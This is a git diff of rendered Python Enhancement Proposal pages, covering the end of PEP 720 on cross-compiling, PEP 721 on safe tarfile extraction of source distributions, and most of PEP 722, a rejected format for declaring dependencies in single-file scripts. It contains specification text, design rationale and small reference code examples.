exec_prefixplatform dependent (eg. native code)site-specific
base_prefixplatform independent (eg. pure Python)installation-wide
base_exec_prefixplatform dependent (eg. native code)installation-wide
+

 Because the site-specific prefixes will be different inside virtual environments, checking sys.prefix != sys.base_prefix is commonly used to check if we are in a virtual environment.

+
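 For example, the check described above can be written as:
 
+
import sys
+
+def in_virtual_environment() -> bool:
+    # Inside a virtual environment, the site-specific prefix differs from
+    # the installation-wide one.
+    return sys.prefix != sys.base_prefix
+
+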
+
+
+
+

Case studies

+
+

crossenv

+
+
Description:
+
Virtual Environments for Cross-Compiling Python Extension Modules.
+
URL:
+
https://github.com/benfogle/crossenv
+
+

crossenv is a tool to create a virtual environment with a monkeypatched +Python installation that tries to emulate the target machine in certain +scenarios. More about this approach can be found in the +Faking the target environment section.

+
+
+

conda-forge

+
+
Description:
+
A community-led collection of recipes, build infrastructure and distributions for the conda package manager.
+
URL:
+
https://conda-forge.org/
+
+

XXX: Jaime will write a quick summary once the PEP draft is public.

+

XXX +Uses a modified crossenv.

+
+
+

Yocto Project

+
+
Description:
+
The Yocto Project is an open source collaboration project that helps developers create custom Linux-based systems regardless of the hardware architecture.
+
URL:
+
https://www.yoctoproject.org/
+
+

XXX: Sent email to the mailing list.

+

TODO

+
+
+

Buildroot

+
+
Description:
+
Buildroot is a simple, efficient and easy-to-use tool to generate embedded Linux systems through cross-compilation.
+
URL:
+
https://buildroot.org/
+
+

TODO

+
+
+

Pyodide

+
+
Description:
+
Pyodide is a Python distribution for the browser and Node.js based on WebAssembly.
+
URL:
+
https://pyodide.org/en/stable/
+
+

XXX: Hood should review/expand this section.

+

 Pyodide is a Python distribution for the browser and Node.js, compiled to WebAssembly using the Emscripten toolchain.

+

 It patches several aspects of the CPython installation and some external components. A custom package manager — micropip — supporting both pure-Python and wasm32/Emscripten wheels, is also provided as part of the distribution. On top of this, a repo with a selected set of 3rd party packages is also provided and enabled by default.

+
+
+

Beeware

+
+
Description:
+
BeeWare allows you to write your app in Python and release it on multiple platforms.
+
URL:
+
https://beeware.org/
+
+

TODO

+
+
+

python-for-android

+
+
Description:
+
Turn your Python application into an Android APK.
+
URL:
+
https://github.com/kivy/python-for-android
+
+

resource https://github.com/Android-for-Python/Android-for-Python-Users

+

python-for-android is a tool to package Python apps on Android. It creates a +Python distribution with your app and its dependencies.

+

Pure-Python dependencies are handled automatically and in a generic way, but +native dependencies need recipes. A set of recipes for +popular dependencies is provided, but users need to provide their own +recipes for any other native dependencies.

+
+
+

kivy-ios

+
+
Description:
+
Toolchain for compiling Python / Kivy / other libraries for iOS.
+
URL:
+
https://github.com/kivy/kivy-ios
+
+

kivy-ios is a tool to package Python apps on iOS. It provides a toolchain to +build a Python distribution with your app and its dependencies, as well as a CLI +to create and manage Xcode projects that integrate with the toolchain.

+

It uses the same approach as python-for-android (also maintained by the +Kivy project) for app dependencies — pure-Python dependencies are handled +automatically, but native dependencies need recipes, and the project provides +recipes for popular dependencies.

+
+
+

AidLearning

+
+
Description:
+
AI, Android, Linux, ARM: AI application development platform based on Android+Linux integrated ecology.
+
URL:
+
https://github.com/aidlearning/AidLearning-FrameWork
+
+

TODO

+
+
+

QPython

+
+
Description:
+
QPython is the Python engine for android.
+
URL:
+
https://github.com/qpython-android/qpython
+
+

TODO

+
+
+

pyqtdeploy

+
+
Description:
+
pyqtdeploy is a tool for deploying PyQt applications.
+
URL:
+
https://www.riverbankcomputing.com/software/pyqtdeploy/
+
+

contact https://www.riverbankcomputing.com/pipermail/pyqt/2023-May/thread.html +contacted Phil, the maintainer

+

TODO

+
+
+

Chaquopy

+
+
Description:
+
Chaquopy provides everything you need to include Python components in an Android app.
+
URL:
+
https://chaquo.com/chaquopy/
+
+

TODO

+
+
+

EDK II

+
+
Description:
+
EDK II is a modern, feature-rich, cross-platform firmware development environment for the UEFI and PI specifications.
+
URL:
+
https://github.com/tianocore/edk2-libc/tree/master/AppPkg/Applications/Python
+
+

TODO

+
+
+

ActivePython

+
+
Description:
+
Commercial-grade, quality-assured Python distribution focusing on easy installation and cross-platform compatibility on Windows, Linux, Mac OS X, Solaris, HP-UX and AIX.
+
URL:
+
https://www.activestate.com/products/python/
+
+

TODO

+
+
+

Termux

+
+
Description:
+
Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required.
+
URL:
+
https://termux.dev/en/
+
+

TODO

+
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0720.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0721/index.html b/pep-0721/index.html new file mode 100644 index 00000000000..7a2aa488edd --- /dev/null +++ b/pep-0721/index.html @@ -0,0 +1,327 @@ + + + + + + + + PEP 721 – Using tarfile.data_filter for source distribution extraction | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 721 – Using tarfile.data_filter for source distribution extraction

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Requires:
+
706
+
Created:
+
12-Jul-2023
+
Python-Version:
+
3.12
+
Post-History:
+
04-Jul-2023
+
Resolution:
+
02-Aug-2023
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Source distribution archive features, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

Extracting a source distribution archive should normally use the data +filter added in PEP 706. +We clarify details, and specify the behaviour for tools that cannot use the +filter directly.

+
+
+

Motivation

+

The source distribution sdist is defined as a tar archive.

+

The tar format is designed to capture all metadata of Unix-like files. +Some of these are dangerous, unnecessary for source code, and/or +platform-dependent. +As explained in PEP 706, when extracting a tarball, one should always either +limit the allowed features, or explicitly give the tarball total control.

+
+
+

Rationale

+

For source distributions, the data filter introduced in PEP 706 +is enough. It allows slightly more features than git and zip (both +commonly used in packaging workflows).

+

 However, not all tools can use the data filter, so this PEP specifies an explicit set of expectations. The aim is that the current behaviour of pip download and setuptools.archive_util.unpack_tarfile is valid, except for cases deemed too dangerous to allow. Another consideration is ease of implementation for non-Python tools.

+
+

Unpatched versions of Python

+

Tools are allowed to ignore this PEP when running on Python without tarfile +filters.

+

The feature has been backported to all versions of Python supported by +python.org. Vendoring it in third-party libraries is tricky, +and we should not force all tools to do so. +This shifts the responsibility to keep up with security updates from the tools +to the users.

+
+
+

Permissions

+

Common tools (git, zip) don’t preserve Unix permissions (mode bits). +Telling users to not rely on them in sdists, and allowing tools to handle +them relatively freely, seems fair.

+

 The only exception is the executable permission. We recommend, but do not require, that tools preserve it. Given that scripts are generally platform-specific, it seems fitting to say that keeping them executable is tool-specific behaviour.

+

Note that while git preserves executability, zip (and thus wheel) +doesn’t do it natively. (It is possible to encode it in “external attributes”, +but Python’s ZipFile.extract does not honour that.)

+
+
+
+

Specification

+

The following will be added to the PyPA source distribution format spec +under a new heading, “Source distribution archive features”:

+

Because extracting tar files as-is is dangerous, and the results are +platform-specific, archive features of source distributions are limited.

+
+

Unpacking with the data filter

+

When extracting a source distribution, tools MUST either use +tarfile.data_filter (e.g. TarFile.extractall(..., filter='data')), OR +follow the Unpacking without the data filter section below.

+

 As an exception, on Python interpreters without hasattr(tarfile, 'data_filter') (PEP 706), tools that normally use that filter (directly or indirectly) MAY warn the user and ignore this specification. The trade-off between usability (e.g. fully trusting the archive) and security (e.g. refusing to unpack) is left up to the tool in this case.

+
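 A minimal sketch of a conforming extraction (the function name, archive path, and destination are illustrative):
 
+
import tarfile
+
+def extract_sdist(archive: str, dest: str) -> None:
+    with tarfile.open(archive) as tar:
+        if hasattr(tarfile, "data_filter"):
+            tar.extractall(dest, filter="data")
+        else:
+            # Interpreter without the PEP 706 backport: a tool MAY warn and
+            # make its own usability/security trade-off here.
+            print("warning: tarfile filters unavailable; extracting as-is")
+            tar.extractall(dest)
+
+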
+
+

Unpacking without the data filter

+

Tools that do not use the data filter directly (e.g. for backwards +compatibility, allowing additional features, or not using Python) MUST follow +this section. +(At the time of this writing, the data filter also follows this section, +but it may get out of sync in the future.)

+

The following files are invalid in an sdist archive. +Upon encountering such an entry, tools SHOULD notify the user, +MUST NOT unpack the entry, and MAY abort with a failure:

+
    +
  • Files that would be placed outside the destination directory.
  • +
  • Links (symbolic or hard) pointing outside the destination directory.
  • +
  • Device files (including pipes).
  • +
+

The following are also invalid. Tools MAY treat them as above, +but are NOT REQUIRED to do so:

+
    +
  • Files with a .. component in the filename or link target.
  • +
  • Links pointing to a file that is not part of the archive.
  • +
+

Tools MAY unpack links (symbolic or hard) as regular files, +using content from the archive.

+

 When extracting sdist archives (a sketch of one conforming mode-bit policy follows this list):

+
    +
  • Leading slashes in file names MUST be dropped. +(This is nowadays standard behaviour for tar unpacking.)
  • +
  • For each mode (Unix permission) bit, tools MUST either:
      +
    • use the platform’s default for a new file/directory (respectively),
    • +
    • set the bit according to the archive, or
    • +
    • use the bit from rw-r--r-- (0o644) for non-executable files or +rwxr-xr-x (0o755) for executable files and directories.
    • +
    +
  • +
  • High mode bits (setuid, setgid, sticky) MUST be cleared.
  • +
  • It is RECOMMENDED to preserve the user executable bit.
  • +
+
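 A hedged sketch of one mode-bit policy satisfying the rules above, for tools that do not use the stdlib filter (the helper name is ours):
 
+
import stat
+import tarfile
+
+def normalised_mode(member: tarfile.TarInfo) -> int:
+    # High mode bits (setuid, setgid, sticky) MUST be cleared.
+    mode = member.mode & 0o777
+    # Fixed permissions, preserving the (recommended) user executable bit;
+    # directories stay traversable.
+    if member.isdir() or mode & stat.S_IXUSR:
+        return 0o755
+    return 0o644
+
+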
+
+

Further hints

+

Tool authors are encouraged to consider how hints for further +verification in tarfile documentation apply for their tool.

+
+
+
+

Backwards Compatibility

+

The existing behaviour is unspecified, and treated differently by different +tools. +This PEP makes the expectations explicit.

+

There is no known case of backwards incompatibility, but some project out there +probably does rely on details that aren’t guaranteed. +This PEP bans the most dangerous of those features, and the rest is +made tool-specific.

+
+
+

Security Implications

+

The recommended data filter is believed safe against common exploits, +and is a single place to amend if flaws are found in the future.

+

The explicit specification includes protections from the data filter.

+
+
+

How to Teach This

+

The PEP is aimed at authors of packaging tools, who should be fine with +a PEP and an updated packaging spec.

+
+
+

Reference Implementation

+

TBD

+
+
+

Rejected Ideas

+

None yet.

+
+
+

Open Issues

+

None yet.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0721.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0722/index.html b/pep-0722/index.html new file mode 100644 index 00000000000..5b8e7ada22b --- /dev/null +++ b/pep-0722/index.html @@ -0,0 +1,780 @@ + + + + + + + + PEP 722 – Dependency specification for single-file scripts | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 722 – Dependency specification for single-file scripts

+
+
Author:
+
Paul Moore <p.f.moore at gmail.com>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
19-Jul-2023
+
Post-History:
+
19-Jul-2023
+
Resolution:
+
Discourse thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies a format for including 3rd-party dependencies in a +single-file Python script.

+
+
+

Motivation

+

Not all Python code is structured as a “project”, in the sense of having its own directory complete with a pyproject.toml file, and being built into an installable distribution package. Python is also routinely used as a scripting language, with Python scripts as a (better) alternative to shell scripts, batch files, etc. When used to create scripts, Python code is typically stored as a single file, often in a directory dedicated to such “utility scripts”, which might be in a mix of languages with Python being only one possibility among many. Such scripts may be shared, often by something as simple as email, or a link to a URL such as a GitHub gist. But they are typically not “distributed” or “installed” as part of a normal workflow.

One problem when using Python as a scripting language in this way is how to run the script in an environment that contains whatever third party dependencies are required by the script. There is currently no standard tool that addresses this issue, and this PEP does not attempt to define one. However, any tool that does address this issue will need to know what 3rd party dependencies a script requires. By defining a standard format for storing such data, existing tools, as well as any future tools, will be able to obtain that information without requiring users to include tool-specific metadata in their scripts.

+
+
+

Rationale

+

Because a key requirement is writing single-file scripts, and simple sharing by giving someone a copy of the script, the PEP defines a mechanism for embedding dependency data within the script itself, and not in an external file.

We define the concept of a dependency block that contains information about what 3rd party packages a script depends on.

In order to identify dependency blocks, the script can simply be read as a text file. This is deliberate, as Python syntax changes over time, so attempting to parse the script as Python code would require choosing a specific version of Python syntax. Also, it is likely that at least some tools will not be written in Python, and expecting them to implement a Python parser is too much of a burden.

However, to avoid needing changes to core Python, the format is designed to appear as comments to the Python parser. It is possible to write code where a dependency block is not interpreted as a comment (for example, by embedding it in a Python multi-line string), but such uses are discouraged and can easily be avoided assuming you are not deliberately trying to create a pathological example.

A review of how other languages allow scripts to specify their dependencies shows that a “structured comment” like this is a commonly-used approach.

+
+
+

Specification

+

The content of this section will be published in the Python Packaging user guide, PyPA Specifications section, as a document with the title “Embedding Metadata in Script Files”.

Any Python script may contain a dependency block. The dependency block is identified by reading the script as a text file (i.e., the file is not parsed as Python source code), looking for the first line of the form:

+
# Script Dependencies:
+
+
+

The hash character must be at the start of the line with no preceding whitespace. The text “Script Dependencies” is recognised regardless of case, and the spaces represent arbitrary whitespace (although at least one space must be present). The following regular expression recognises the dependency block header line:

+
(?i)^#\s+script\s+dependencies:\s*$
+
+
+
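As an informal illustration (not part of the specification), the header recognition can be exercised directly with Python’s re module; the sample lines here are made up:

import re

HEADER = r"(?i)^#\s+script\s+dependencies:\s*$"

# Matches: case-insensitive, with arbitrary (non-empty) internal whitespace.
assert re.match(HEADER, "# Script Dependencies:")
assert re.match(HEADER, "#  script   DEPENDENCIES:  ")
# No match: missing space after '#', or whitespace before it.
assert not re.match(HEADER, "#Script Dependencies:")
assert not re.match(HEADER, "  # Script Dependencies:")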

Tools reading the dependency block MAY respect the standard Python encoding declaration. If they choose not to do so, they MUST process the file as UTF-8.

After the header line, all lines in the file up to the first line that doesn’t start with a # sign are considered dependency lines and are treated as follows:

+
  1. The initial # sign is stripped.
  2. If the line contains the character sequence “ # ” (SPACE HASH SPACE), then those characters and any subsequent characters are discarded. This allows dependency blocks to contain inline comments.
  3. Whitespace at the start and end of the remaining text is discarded.
  4. If the line is now empty, it is ignored.
  5. The content of the line MUST now be a valid PEP 508 dependency specifier.

The requirement for spaces before and after the # in an inline comment is necessary to distinguish them from part of a PEP 508 URL specifier (which can contain a hash, but without surrounding whitespace).

Consumers MUST validate that at a minimum, all dependencies start with a name as defined in PEP 508, and they MAY validate that all dependencies conform fully to PEP 508. They MUST fail with an error if they find an invalid specifier.

+
+

Example

+

The following is an example of a script with an embedded dependency block:

+
# In order to run, this script needs the following 3rd party libraries
+#
+# Script Dependencies:
+#    requests
+#    rich     # Needed for the output
+#
+#    # Not needed - just to show that fragments in URLs do not
+#    # get treated as comments
+#    pip @ https://github.com/pypa/pip/archive/1.3.1.zip#sha1=da9234ee9982d4bbb3c72346a6de940a148ea686
+
+import requests
+from rich.pretty import pprint
+
+resp = requests.get("https://peps.python.org/api/peps.json")
+data = resp.json()
+pprint([(k, v["title"]) for k, v in data.items()][:10])
+
+
+
+
+
+

Backwards Compatibility

+

As dependency blocks take the form of a structured comment, they can be added without altering the meaning of existing code.

It is possible that a comment may already exist which matches the form of a dependency block. While the identifying header text, “Script Dependencies”, is chosen to minimise this risk, it is still possible.

In the rare case where an existing comment would be interpreted incorrectly as a dependency block, this can be addressed by adding an actual dependency block (which can be empty if the script has no dependencies) earlier in the code.

+
+
+

Security Implications

+

If a script containing a dependency block is run using a tool that automatically installs dependencies, this could cause arbitrary code to be downloaded and installed in the user’s environment.

The risk here is part of the functionality of the tool being used to run the script, and as such should already be addressed by the tool itself. The only additional risk introduced by this PEP is if an untrusted script with a dependency block is run, when a potentially malicious dependency might be installed. This risk is addressed by the normal good practice of reviewing code before running it.

+
+
+

How to Teach This

+

The format is intended to be close to how a developer might already specify script dependencies in an explanatory comment. The required structure is deliberately minimal, so that formatting rules are easy to learn.

Users will need to know how to write Python dependency specifiers. This is covered by PEP 508, but for simple examples (which is expected to be the norm for inexperienced users) the syntax is either just a package name, or a name and a version restriction, which is fairly well-understood syntax.

Users will also need to know how to run a script using a tool that interprets dependency data. This is not covered by this PEP, as it is the responsibility of such a tool to document how it should be used.

Note that the core Python interpreter does not interpret dependency blocks. This may be a point of confusion for beginners, who try to run python some_script.py and do not understand why it fails. This is no different than the current status quo, though, where running a script without its dependencies present will give an error.

In general, it is assumed that if a beginner is given a script with dependencies (regardless of whether they are specified in a dependency block), the person supplying the script should explain how to run that script, and if that involves using a script runner tool, that should be noted.

+
+
+

Recommendations

+

This section is non-normative and simply describes “good practices” when using dependency blocks.

While it is permitted for tools to do minimal validation of requirements, in practice they should do as much “sanity check” validation as possible, even if they cannot do a full check for PEP 508 syntax. This helps to ensure that dependency blocks that are not correctly terminated are reported early. A good compromise between the minimal approach of checking just that the requirement starts with a name, and full PEP 508 validation, is to check for a bare name, or a name followed by optional whitespace, and then one of [ (extra), @ (urlspec), ; (marker) or one of (<!=>~ (version).
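A sketch of such a check is shown here; the regular expression and function name are illustrative only, with the name pattern following the PEP 508 grammar:

import re

# A PEP 508 name, optionally followed by whitespace and then end-of-line
# or one of: '[' (extra), '@' (urlspec), ';' (marker), or '(', '<', '!',
# '=', '>', '~' (the start of a version constraint).
SANITY = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9._-]*[A-Za-z0-9])?\s*($|[\[@;(<!=>~])"
)

def looks_like_requirement(line: str) -> bool:
    # True for e.g. "requests", "rich>=10", "pip @ https://..."; False
    # for lines that cannot possibly be PEP 508 specifiers.
    return SANITY.match(line) is not None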

+

Scripts should, in general, place the dependency block at the top of the file, either immediately after any shebang line, or straight after the script docstring. In particular, the dependency block should always be placed before any executable code in the file. This makes it easy for the human reader to locate it.

+
+
+

Reference Implementation

+

Code to implement this proposal in Python is fairly straightforward, so the reference implementation can be included here.

+
import re
+import tokenize
+from packaging.requirements import Requirement
+
+DEPENDENCY_BLOCK_MARKER = r"(?i)^#\s+script\s+dependencies:\s*$"
+
+def read_dependency_block(filename):
+    # Use the tokenize module to handle any encoding declaration.
+    with tokenize.open(filename) as f:
+        # Skip lines until we reach a dependency block (OR EOF).
+        for line in f:
+            if re.match(DEPENDENCY_BLOCK_MARKER, line):
+                break
+        # Read dependency lines until we hit a line that doesn't
+        # start with #, or we are at EOF.
+        for line in f:
+            if not line.startswith("#"):
+                break
+            # Remove comments. An inline comment is introduced by
+            # a hash, which must be preceded and followed by a
+            # space.
+            line = line[1:].split(" # ", maxsplit=1)[0]
+            line = line.strip()
+            # Ignore empty lines
+            if not line:
+                continue
+            # Try to convert to a requirement. This will raise
+            # an error if the line is not a PEP 508 requirement
+            yield Requirement(line)
+
+
+
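For example, assuming a hypothetical script named example.py, the generator above could be driven as follows:

for req in read_dependency_block("example.py"):
    # Requirement objects from `packaging` expose the parsed parts.
    print(req.name, req.specifier)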

A format similar to the one proposed here is already supported in pipx and in pip-run.

+
+
+

Rejected Ideas

+
+

Why not include other metadata?

+

The core use case addressed by this proposal is that of identifying what dependencies a standalone script needs in order to run successfully. This is a common real-world issue that is currently solved by script runner tools, using implementation-specific ways of storing the data. Standardising the storage format improves interoperability by not tying the script to a particular runner.

While it is arguable that other forms of metadata could be useful in a standalone script, the need is largely theoretical at this point. In practical terms, scripts either don’t use other metadata, or they store it in existing, widely used (and therefore de facto standard) formats. For example, scripts needing README style text typically use the standard Python module docstring, and scripts wanting to declare a version use the common convention of having a __version__ variable.

One case which was raised during the discussion on this PEP was the ability to declare a minimum Python version that a script needed to run, by analogy with the Requires-Python core metadata item for packages. Unlike packages, scripts are normally only run by one user or in one environment, in contexts where multiple versions of Python are uncommon. The need for this metadata is therefore much less critical in the case of scripts. As further evidence of this, the two key script runners currently available, pipx and pip-run, do not offer a means of including this data in a script.

Creating a standard “metadata container” format would unify the various approaches, but in practical terms there is no real need for unification, and the disruption would either delay adoption, or more likely simply mean script authors would ignore the standard.

This proposal therefore chooses to focus just on the one use case where there is a clear need for something, and no existing standard or common practice.

+
+
+

Why not use a marker per line?

+

Rather than using a comment block with a header, another possibility would be to use a marker on each line, something like:

+
# Script-Dependency: requests
+# Script-Dependency: click
+
+
+

While this makes it easier to parse lines individually, it has a number of issues. The first is simply that it’s rather verbose, and less readable. This is clearly affected by the chosen keyword, but all of the suggested options were (in the author’s opinion) less readable than the block comment form.

More importantly, this form by design makes it impossible to require that the dependency specifiers are all together in a single block. As a result, it’s not possible for a human reader, without a careful check of the whole file, to be sure that they have identified all of the dependencies. See the question below, “Why not allow multiple dependency blocks and merge them?”, for further discussion of this problem.

Finally, as the reference implementation demonstrates, parsing the “comment block” form isn’t, in practice, significantly more difficult than parsing this form.

+
+
+

Why not use a distinct form of comment for the dependency block?

+

A previous version of this proposal used ## to identify dependency blocks. Unfortunately, however, the flake8 linter implements a rule requiring that comments must have a space after the initial # sign. While the PEP author considers that rule misguided, it is on by default and as a result would cause checks to fail when faced with a dependency block.

Furthermore, the black formatter, although it allows the ## form, does add a space after the # for most other forms of comment. This means that if we chose an alternative like #%, automatic reformatting would corrupt the dependency block. Forms including a space, like # #, are possible, but less natural for the average user (omitting the space is an obvious mistake to make).

While it is possible that linters and formatters could be changed to recognise the new standard, the benefit of having a dedicated prefix did not seem sufficient to justify the transition cost, or the risk that users might be using older tools.

+
+
+

Why not allow multiple dependency blocks and merge them?

+

Because it’s too easy for the human reader to miss the fact that there’s a second dependency block. This could simply result in the script runner unexpectedly downloading extra packages, or it could even be a way to smuggle malicious packages onto a user’s machine (by “hiding” a second dependency block in the body of the script).

While the principle of “don’t run untrusted code” applies here, the benefits aren’t sufficient to be worth the risk.

+
+
+

Why not use a more standard data format (e.g., TOML)?

+

First of all, the only practical choice for an alternative format is TOML. Python packaging has standardised on TOML for structured data, and using a different format, such as YAML or JSON, would add complexity and confusion for no real benefit.

So the question is essentially, “why not use TOML?”

The key idea behind the “dependency block” format is to define something that reads naturally as a comment in the script. Dependency data is useful both for tools and for the human reader, so having a human readable format is beneficial. On the other hand, TOML of necessity has a syntax of its own, which distracts from the underlying data.

+

It is important to remember that developers who write scripts in Python are often not experienced in Python, or Python packaging. They are often systems administrators, or data analysts, who may simply be using Python as a “better batch file”. For such users, the TOML format is extremely likely to be unfamiliar, and the syntax will be obscure to them, and not particularly intuitive. Such developers may well be copying dependency specifiers from sources such as Stack Overflow, without really understanding them. Having to embed such a requirement into a TOML structure is an additional complexity – and it is important to remember that the goal here is to make using 3rd party libraries easy for such users.

Furthermore, TOML, by its nature, is a flexible format intended to support very general data structures. There are many ways of writing a simple list of strings in it, and it will not be clear to inexperienced users which form to use.

Another potential issue is that using a generalised TOML parser can in some cases result in a measurable performance overhead. Startup time is often quoted as an issue when running small scripts, so this may be a problem for script runners that are aiming for high performance.

And finally, there will be tools that expect to write dependency data into scripts – for example, an IDE with a feature that automatically adds an import and a dependency specifier when you reference a library function. While libraries exist that allow editing TOML data, they are not always good at preserving the user’s layout. Even if libraries exist which do an effective job at this, expecting all tools to use such a library is a significant imposition on code supporting this PEP.

By choosing a simple, line-based format with no quoting rules, dependency data is easy to read (for humans and tools) and easy to write. The format doesn’t have the flexibility of something like TOML, but the use case simply doesn’t demand that sort of flexibility.

+
+
+

Why not use (possibly restricted) Python syntax?

+

This would typically involve storing the dependencies as a (runtime) list variable with a conventional name, such as:

+
__requires__ = [
+    "requests",
+    "click",
+]
+
+
+

Other suggestions include a static multi-line string, or including the dependencies in the script’s docstring.

The most significant problem with this proposal is that it requires all consumers of the dependency data to implement a Python parser. Even if the syntax is restricted, the rest of the script will use the full Python syntax, and trying to define a syntax which can be successfully parsed in isolation from the surrounding code is likely to be extremely difficult and error-prone.

Furthermore, Python’s syntax changes in every release. If extracting dependency data needs a Python parser, the parser will need to know which version of Python the script is written for, and the overhead for a generic tool of having a parser that can handle multiple versions of Python is unsustainable.

Even if the above issues could be addressed, the format would give the impression that the data could be altered at runtime. However, this is not the case in general, and code that tries to do so will encounter unexpected and confusing behaviour.

And finally, there is no evidence that having dependency data available at runtime is of any practical use. Should such a use be found, it is simple enough to get the data by parsing the source - read_dependency_block(__file__).
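For instance, a script could (illustratively) introspect its own dependency block, reusing the reference implementation above:

# Self-inspection: parse this very file's dependency block at runtime.
requirements = list(read_dependency_block(__file__))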

+

It is worth noting, though, that the pip-run utility does implement (an extended form of) this approach. Further discussion of the pip-run design is available on the project’s issue tracker.

+
+
+

Why not embed a pyproject.toml file in the script?

+

First of all, pyproject.toml is a TOML based format, so all of the previous concerns around TOML as a format apply. However, pyproject.toml is a standard used by Python packaging, and re-using an existing standard is a reasonable suggestion that deserves to be addressed on its own merits.

The first issue is that the suggestion rarely implies that all of pyproject.toml is to be supported for scripts. A script is not intended to be “built” into any sort of distributable artifact like a wheel (see below for more on this point), so the [build-system] section of pyproject.toml makes little sense, for example. And while the tool-specific sections of pyproject.toml might be useful for scripts, it’s not at all clear that a tool like ruff would want to support per-file configuration in this way, leading to confusion when users expect it to work, but it doesn’t. Furthermore, this sort of tool-specific configuration is just as useful for individual files in a larger project, so we have to consider what it would mean to embed a pyproject.toml into a single file in a larger project that has its own pyproject.toml.

In addition, pyproject.toml is currently focused on projects that are to be built into wheels. There is an ongoing discussion about how to use pyproject.toml for projects that are not intended to be built as wheels, and until that question is resolved (which will likely require some PEPs of its own) it seems premature to be discussing embedding pyproject.toml into scripts, which are definitely not intended to be built and distributed in that manner.

The conclusion, therefore (which has been stated explicitly in some, but not all, cases) is that this proposal is intended to mean that we would embed part of pyproject.toml. Typically this is the [project] section from PEP 621, or even just the dependencies item from that section.

At this point, the first issue is that by framing the proposal as “embedding pyproject.toml”, we would be encouraging the sort of confusion discussed in the previous paragraphs - developers will expect the full capabilities of pyproject.toml, and be confused when there are differences and limitations. It would be better, therefore, to consider this suggestion as simply being a proposal to use an embedded TOML format, but specifically re-using the structure of a particular part of pyproject.toml. The problem then becomes how we describe that structure, without causing confusion for people familiar with pyproject.toml. If we describe it with reference to pyproject.toml, the link is still there. But if we describe it in isolation, people will be confused by the “similar but different” nature of the structure.

It is also important to remember that a key part of the target audience for this proposal is developers who are simply using Python as a “better batch file” solution. These developers will generally not be familiar with Python packaging and its conventions, and are often the people most critical of the “complexity” and “difficulty” of packaging solutions. As a result, proposals based on those existing solutions are likely to be unwelcome to that audience, and could easily result in people simply continuing to use existing adhoc solutions, and ignoring the standard that was intended to make their lives easier.

+
+
+

Why not infer the requirements from import statements?

+

The idea would be to automatically recognize import statements in the source file and turn them into a list of requirements.

However, this is infeasible for several reasons. First, the points above about the necessity to keep the syntax easily parsable, for all Python versions, also by tools written in other languages, apply equally here.

Second, PyPI and other package repositories conforming to the Simple Repository API do not provide a mechanism to resolve package names from the module names that are imported (see also this related discussion).

Third, even if repositories did offer this information, the same import name may correspond to several packages on PyPI. One might object that disambiguating which package is wanted would only be needed if there are several projects providing the same import name. However, this would make it easy for anyone to unintentionally or malevolently break working scripts, by uploading a package to PyPI providing an import name that is the same as an existing project. The alternative where, among the candidates, the first package to have been registered on the index is chosen, would be confusing in case a popular package is developed with the same import name as an existing obscure package, and even harmful if the existing package is malware intentionally uploaded with a sufficiently generic import name that has a high probability of being reused.

A related idea would be to attach the requirements as comments to the import statements instead of gathering them in a block, with a syntax such as:

+
import numpy as np # requires: numpy
+import rich # requires: rich
+
+
+

This still suffers from parsing difficulties. Also, where to place the comment in the case of multiline imports is ambiguous and may look ugly:

+
from PyQt5.QtWidgets import (
+    QCheckBox, QComboBox, QDialog, QDialogButtonBox,
+    QGridLayout, QLabel, QSpinBox, QTextEdit
+) # requires: PyQt5
+
+
+

Furthermore, this syntax cannot behave as might be intuitively expected in all situations. Consider:

+
import platform
+if platform.system() == "Windows":
+    import pywin32 # requires: pywin32
+
+
+

Here, the user’s intent is that the package is only required on Windows, but this cannot be understood by the script runner (the correct way to write it would be requires: pywin32 ; sys_platform == 'win32').

+

(Thanks to Jean Abou-Samra for the clear discussion of this point)

+
+
+

Why not simply manage the environment at runtime?

+

Another approach to running scripts with dependencies is simply to manage those dependencies at runtime. This can be done by using a library that makes packages available. There are many options for implementing such a library, for example by installing them directly into the user’s environment or by manipulating sys.path to make them available from a local cache.

+

These approaches are not incompatible with this PEP. An API such as

+
env_mgr.install("rich")
+env_mgr.install("click")
+
+import rich
+import click
+
+...
+
+
+

is certainly feasible. However, such a library could be written without the need for any new standards, and as far as the PEP author is aware, this has not happened. This suggests that an approach like this is not as attractive as it first seems. There is also the bootstrapping issue of making the env_mgr library available in the first place. And finally, this approach doesn’t actually offer any interoperability benefits, as it does not use a standard form for the dependency list, and so other tools cannot access the data.

In any case, such a library could still benefit from this proposal, as it could include an API to read the packages to install from the script dependency block. This would give the same functionality while allowing interoperability with other tools that support this specification.

+
# Script Dependencies:
+#     rich
+#     click
+env_mgr.install_dependencies(__file__)
+
+import rich
+import click
+
+...
+
+
+
+
+

Why not just set up a Python project with a pyproject.toml?

+

Again, a key issue here is that the target audience for this proposal is people writing scripts which aren’t intended for distribution. Sometimes scripts will be “shared”, but this is far more informal than “distribution” - it typically involves sending a script via an email with some written instructions on how to run it, or passing someone a link to a gist.

Expecting such users to learn the complexities of Python packaging is a significant step up in complexity, and would almost certainly give the impression that “Python is too hard for scripts”.

